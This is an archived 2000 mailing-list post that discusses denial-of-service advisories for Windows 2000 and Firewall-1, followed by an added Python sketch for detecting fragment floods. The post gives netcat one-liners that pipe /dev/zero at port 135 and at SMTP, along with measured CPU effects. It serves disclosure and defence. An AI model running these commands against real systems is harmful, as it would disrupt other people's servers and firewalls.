Vulnerability Development mailing list archives

Win2k and /dev/zero


From: pete () S3 INTEGRALIS CO UK (Pete Philips)
Date: Mon, 3 Jul 2000 11:11:22 +0100


Anyone played with this yet?

SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols
partial Denial of Service in Microsoft Windows 2000 Server

Summary

Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible
to a simple network attack which raises CPU utilization on Windows 2000
Server to 100%.

My initial results (tested locally on a LAN) are:

Using:
% nc -u <host> 135 < /dev/zero

Results:
Win2k                = 100% CPU for duration of attack
NT4                  = 55%  CPU for duration
NT4 + MS00-029 patch = No effect

The effect of the Jolt2 patch and tcpdump output indicate that
this is a fragmentation attack variation. My tests yielded multiple
fragments of the form:

20780:1480@various  (Frag ID:size@offset)

Anyone tried the Firewall-1 variation?

SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of
Service in Check Point Firewall-1 on Windows NT

Sending a stream of binary zeros over the network to the SMTP port on the firewall
raises the target system's load to 100% while the load on the attacker's
system remains relatively low.  This can easily be reproduced from
a Linux system using netcat with an input of /dev/zero, with a command such as
"nc firewall 25 < /dev/zero".

Pete.

 ---------------------------------------------------------------
|   Pete Philips                                           \|/  |
|   Integralis S3 Team                                      O   |
|   E-mail:  pete.philips () integralis co uk                      |
|   Phone:   +44 118 930 6060                                   |
|   PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp        |
 ---------------------------------------------------------------
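A defender-side sketch, added here and not part of Pete's post or the SecureXpert advisories: it parses tcpdump-style fragment lines in the ID:size@offset notation quoted above and flags source/destination pairs emitting a sustained burst of fragments, which is what a /dev/zero stream looks like on the wire. The sample capture, the thresholds and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample (not from the post): tcpdump-style lines in the classic
# "(frag ID:size@offset+)" notation, the ID:size@offset form quoted above. Two
# 8192-byte UDP datagrams to port 135 split into 1480-byte fragments, plus one DNS packet.
SAMPLE_LINES = """\
11:11:22.000100 10.0.0.5.40001 > 10.0.0.9.135: udp 8192 (frag 20780:1480@0+)
11:11:22.000200 10.0.0.5 > 10.0.0.9: (frag 20780:1480@1480+)
11:11:22.000300 10.0.0.5 > 10.0.0.9: (frag 20780:1480@2960+)
11:11:22.000400 10.0.0.5 > 10.0.0.9: (frag 20780:1480@4440+)
11:11:22.000500 10.0.0.5 > 10.0.0.9: (frag 20780:1480@5920+)
11:11:22.000600 10.0.0.5 > 10.0.0.9: (frag 20780:800@7400)
11:11:22.000700 10.0.0.5.40001 > 10.0.0.9.135: udp 8192 (frag 20781:1480@0+)
11:11:22.000800 10.0.0.5 > 10.0.0.9: (frag 20781:1480@1480+)
11:11:22.000900 10.0.0.5 > 10.0.0.9: (frag 20781:1480@2960+)
11:11:22.001000 10.0.0.5 > 10.0.0.9: (frag 20781:1480@4440+)
11:11:22.001100 10.0.0.5 > 10.0.0.9: (frag 20781:1480@5920+)
11:11:22.001200 10.0.0.5 > 10.0.0.9: (frag 20781:800@7400)
11:11:22.300000 10.0.0.7.51000 > 10.0.0.9.53: udp 60
"""

# Host token is "a.b.c.d" or "a.b.c.d.port"; capture only the address.
LINE_RE = re.compile(r"^(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d\.\d+) "
                     r"(?P<src>\d+\.\d+\.\d+\.\d+)(?:\.\d+)? > (?P<dst>\d+\.\d+\.\d+\.\d+)(?:\.\d+)?:")
FRAG_RE = re.compile(r"\(frag (?P<id>\d+):(?P<size>\d+)@(?P<off>\d+)\+?\)")

def fragment_stats(lines):
    """Per (src, dst): fragment count, distinct datagram IDs, fragment bytes, fragments/second."""
    seen = defaultdict(list)  # (src, dst) -> [(time_s, frag_id, size), ...]
    for line in lines.splitlines():
        mo, fr = LINE_RE.match(line), FRAG_RE.search(line)
        if mo and fr:  # skip unparsed lines and unfragmented packets (e.g. the DNS query)
            t = int(mo["h"]) * 3600 + int(mo["m"]) * 60 + float(mo["s"])
            seen[(mo["src"], mo["dst"])].append((t, int(fr["id"]), int(fr["size"])))
    stats = {}
    for key, frags in seen.items():
        times = [t for t, _, _ in frags]
        stats[key] = {
            "frags": len(frags),
            "ids": {fid for _, fid, _ in frags},
            "bytes": sum(sz for _, _, sz in frags),
            "rate": len(frags) / max(max(times) - min(times), 1e-6),
        }
    return stats

def flag_fragment_floods(lines, min_frags=10, min_rate=1000.0):
    """(src, dst) pairs that sent at least min_frags fragments at min_rate or more per second."""
    return [key for key, s in fragment_stats(lines).items()
            if s["frags"] >= min_frags and s["rate"] >= min_rate]
```

Thresholds are a starting point: tune min_frags and min_rate against normal fragment volume on the segment before alerting on them.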

